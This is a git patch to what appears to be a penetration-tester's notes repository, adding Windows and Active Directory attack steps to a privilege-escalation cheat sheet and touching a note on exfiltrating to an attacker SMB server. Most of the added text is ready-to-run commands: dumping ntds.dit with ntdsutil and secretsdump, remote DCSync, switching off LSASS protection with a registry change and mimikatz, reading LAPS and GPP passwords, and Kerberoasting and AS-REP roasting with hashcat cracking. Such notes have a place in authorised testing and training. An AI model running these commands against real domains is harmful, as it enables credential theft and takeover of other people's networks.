From cb7800d75c492ef7bb9103d83d522fb7449a5f08 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 3 Sep 2022 16:24:01 +0200 Subject: [PATCH] bump --- exfiltration/windows/smb_connection.md | 1 + .../priv_esc/docs/windows/windows_priv_esc.md | 127 +++++++++++++++++- 2 files changed, 124 insertions(+), 4 deletions(-) diff --git a/exfiltration/windows/smb_connection.md b/exfiltration/windows/smb_connection.md index 771ec6e..7aa6002 100644 --- a/exfiltration/windows/smb_connection.md +++ b/exfiltration/windows/smb_connection.md @@ -1,6 +1,7 @@ # Connect to Attacker SMB ## Attacker + * Impacket smbserver on attacker ```sh sudo examples/smbserver.py share . -smb2support -username -password diff --git a/post exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post exploitation/priv_esc/docs/windows/windows_priv_esc.md index e6955a6..c76930e 100644 --- a/post exploitation/priv_esc/docs/windows/windows_priv_esc.md +++ b/post exploitation/priv_esc/docs/windows/windows_priv_esc.md @@ -65,12 +65,22 @@ reg query HKCU /f password /t REG_SZ /s ### AD Credentials -* Check AD's NTDS, SYSVOL -* Check user description of AD users +* Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain) ```sh Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description ``` +#### NTDS + +* Check user description of AD users +* NTDS consists of three tables + * Schema + * Link + * Data type +* Located under `C:\Windows\NTDS` +* File is locked by AD at runtime +* A System Bootkey is need to dump the NTDS + ## Exploit * __Use found credentials__ @@ -104,6 +114,7 @@ runas /savecred /user: reverse_shell.exe ### accesschk64 Permissions + * Check access to files and folders ```sh accesschk64 -wvu "file.exe" @@ -298,6 +309,7 @@ copy cmd.exe utilman.exe * Log out, on the Login screen click on `Ease of Access` #### SeImpersonate / SeAssignPrimaryToken + * It is a rouge potato * Execute process as another user * Service accounts operate through impersonation @@ -335,16 +347,19 @@ sekurlsa::logonpasswords ### LSASS Protection -* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under +__The bypass is needed most of the time in order to dump passwords__ +* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `0` under ```sh HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa ``` -* Alternatively use mimikatz +* Alternatively, use mimikatz ```sh +privilege::debug !+ !processprotect /process:lsass.exe /remove ``` +* `+!` calls `mimidrv.sys`, __therefore mimikatz has to be executed inside the same directory the this file lies__ ### Windows Credential Manager @@ -367,3 +382,107 @@ Get-WebCredentials privilege::debug sekurlsa::credman ``` + +### Ntdsutil + +* If administrative permissions on the DC have been gained this can be done +* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) + + +#### Locally extracting ntds.dit + +* This can be done to gather the system boot key +* No AD credentials are needed +* Three files are needed + * C:\Windows\NTDS\ntds.dit + * C:\Windows\System32\config\SYSTEM + * C:\Windows\System32\config\SECURITY + +* Locally dumping all three needed file is done via +```sh +powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q" +``` + +* Use `secretsdump` to extract `ntds.dit` +```sh +secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local +``` + +#### Remotely dumping ntds + +* Needs the following AD credentials + * Replicating Directory Changes + * Replicating Directory Changes All + * Replicating Directory Changes in Filtered Set + +* Mimikatz or impacket can be used to gain credentials +* Impacket's secretsdump.py via +```sh +secretsdump.py -just-dc /@$DC_IP +secretsdump.py -just-dc-ntlm /@$DC_IP +``` + +### Local Administration Password Solution (LAPS) + +* This is possible if the user which credentials we posses is member of the group to make password changes +* Replaces GPP, see below + +* There are two interesting attributes + * __ms-mcs-AdmPwd__ contains plain text password of the local Administrator + * __ms-mcs-AdmPwdExpirationTime__ contains the expiration date of the admin password +* __admpwd.dll__ is used to update the password inside __ms-mcs-AdmPwd__ + * If LAPS is enabled the dll can be found in `C:\Program Files\LAPS\CSE` + +* List the cmdlets for LAPS +```sh +Get-Command *AdmPwd* +``` +* Find the Organisational Unit with extended rights and take a look at the group under `ExtendedRightsHolder` in the output +```sh +Find-AdmPwdExtendedRights -Identity +``` +* Enumerate which hosts have LAPS enabled +* Impersonate the user and execute the following which displays the password +```sh +Get-AdmPwdPassword -ComputerName +``` + +* Use the property name displayed under `ExtendedRightsHolder` to enumerate groups and their users +```sh +net groups +net user +``` + +#### Group Policy Preferences + +* Provisions administrational groups through the domain via SYSVOL +* Distribution is done through XML files on SYSVOL. These contain a password encrypted with [the published private key](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN) +* Use [Powersploit's Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) to decrypt it + + +### Kerberoasting + +* Inital (low level) credentials are needed +* __Service Principal Name (SPN)__ account must be known, e.g. from web IIS user or SQL users +```sh +GetUserSPNs.py -dc-ip $DC_IP / +``` + +* Take a look at `Name` in the output and use it to query a TGS ticket +```sh +GetUserSPNs.py -dc-ip $DC_IP / -request-user +``` + +* Crack the kerberos hash +```sh +hashcat -m 13100 -a0 hash.txt --wordlist +``` + +### AS-REP Roasting + +* `Do not require Kerberos pre-authentication` must be set on the AD user's account login settings. A password is used instead +* A list of potential users with this configured setting should be gathered + +```sh +GetNPUsers.py -dc-ip $DC_IP / -usersfile users.txt +```